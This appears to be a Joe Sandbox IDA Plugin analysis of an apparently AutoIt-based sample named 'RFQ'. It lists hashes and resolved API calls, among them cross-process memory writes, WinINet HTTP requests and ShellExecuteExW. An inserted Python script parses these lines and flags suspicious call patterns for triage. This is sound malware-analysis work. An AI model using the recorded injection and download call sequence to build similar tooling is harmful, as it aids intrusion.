                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \
                                                                          • API String ID: 4104443479-2967466578
                                                                          • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                          • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                          • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                          • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \
                                                                          • API String ID: 4104443479-2967466578
                                                                          • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                          • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                          • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                          • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \
                                                                          • API String ID: 4104443479-2967466578
                                                                          • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                          • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                          • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                          • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                          Strings
                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                          • API String ID: 708495834-557222456
                                                                          • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                          • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                          • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                          • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                          APIs
                                                                            • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                            • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                            • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                            • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                            • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                          • String ID: @
                                                                          • API String ID: 4150878124-2766056989
                                                                          • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                          • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                          • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                          • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \$]$h
                                                                          • API String ID: 4104443479-3262404753
                                                                          • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                          • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                          • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                          • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                          APIs
                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                          • String ID: <$@
                                                                          • API String ID: 2417854910-1426351568
                                                                          • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                          • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                          • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                          • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                          APIs
                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                          • String ID:
                                                                          • API String ID: 3705125965-3916222277
                                                                          • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                          • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                          • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                          • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                          • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                          • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$InfoItem
                                                                          • String ID: 0
                                                                          • API String ID: 135850232-4108050209
                                                                          • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                          • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                          • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                          • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                          APIs
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long
                                                                          • String ID: SysTreeView32
                                                                          • API String ID: 847901565-1698111956
                                                                          • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                          • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                          • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                          • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                          • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                          • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AddressFreeLoadProc
                                                                          • String ID: AU3_GetPluginDetails
                                                                          • API String ID: 145871493-4132174516
                                                                          • Opcode ID: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                                          • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                          • Opcode Fuzzy Hash: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                                          • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
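The WinINet block (InternetOpenUrlW, HttpSendRequestW, HttpQueryInfoW) and the dynamic-import block above (LoadLibraryA, GetProcAddress with the AU3_GetPluginDetails export, FreeLibrary) are the kind of per-function API lists a triager wants to pull out of a long report mechanically rather than by scrolling. The following is an added example, not code from Joe Sandbox or from the analysed sample: it parses "APIs" bullet lines in the exact shapes that appear on this page (with and without an argument list, and the indented "Part of subcall function" form), counts calls per module, and flags three call patterns. The sample lines are copied from the blocks above and embedded as constructed input; the NETWORK_APIS and LAUNCH_APIS sets are this example's own choice and not a Joe Sandbox signature list.

```python
import re
from collections import Counter

# Constructed input: API lines copied from the function blocks on this page.
# Shapes seen here: "Name.MODULE(args), ref: ADDR", "Name.MODULE ref: ADDR"
# (no argument list) and nested "Part of subcall function ADDR: Name.MODULE ...".
SAMPLE_ENTRIES = """\
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
• ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
"""

ENTRY_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z_]\w*)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_entries(text):
    """Parse Joe Sandbox 'APIs' bullet lines into dicts; unresolved args stay '?'."""
    records = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue  # section headers such as 'APIs' / 'Strings' are skipped
        raw = m.group("args")
        records.append({
            "api": m.group("api"),
            "module": m.group("mod").upper(),
            "args": raw.split(",") if raw else [],
            "ref": int(m.group("ref"), 16),
            "subcall_of": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return records


def module_counts(records):
    """How many resolved calls each DLL accounts for in the block."""
    return Counter(r["module"] for r in records)


# Patterns worth a second look in a function block. These sets are this
# example's own choice (assumption), not a list taken from Joe Sandbox.
NETWORK_APIS = {"InternetOpenUrlW", "HttpSendRequestW", "HttpQueryInfoW", "InternetReadFile"}
LAUNCH_APIS = {"ShellExecuteExW", "CreateProcessW", "WinExec"}


def find_patterns(records):
    """Return (kind, detail, address) tuples for the call patterns of interest."""
    findings = []
    # Dynamic import: LoadLibrary* with a later GetProcAddress. Report the
    # export name whenever the sandbox recovered it as a literal string.
    for i, r in enumerate(records):
        if r["api"].startswith("LoadLibrary"):
            for later in records[i + 1:]:
                if later["api"] == "GetProcAddress":
                    export = later["args"][1] if len(later["args"]) > 1 else "?"
                    findings.append(("dynamic-import", export, later["ref"]))
                    break
    net = [r for r in records if r["api"] in NETWORK_APIS]
    if net:
        findings.append(("wininet-http", ",".join(r["api"] for r in net), net[0]["ref"]))
    for r in records:
        if r["api"] in LAUNCH_APIS:
            findings.append(("process-launch", r["api"], r["ref"]))
    return findings


if __name__ == "__main__":
    recs = parse_entries(SAMPLE_ENTRIES)
    print(dict(module_counts(recs)))
    for kind, detail, addr in find_patterns(recs):
        print("%-15s %-45s at 0x%08X" % (kind, detail, addr))
```

The regex deliberately keeps "?" as an argument value instead of dropping it, so a literal such as the second GetProcAddress argument is still positionally correct; the subcall address is kept separately so nested calls can be attributed to the helper rather than to the function the block is about.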
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window
                                                                          • String ID: SysMonthCal32
                                                                          • API String ID: 2326795674-1439706946
                                                                          • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                          • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                          • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                          • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: DestroyWindow
                                                                          • String ID: msctls_updown32
                                                                          • API String ID: 3375834691-2298589950
                                                                          • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                          • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                          • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                          • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: $<
                                                                          • API String ID: 4104443479-428540627
                                                                          • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                          • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                          • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                          • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
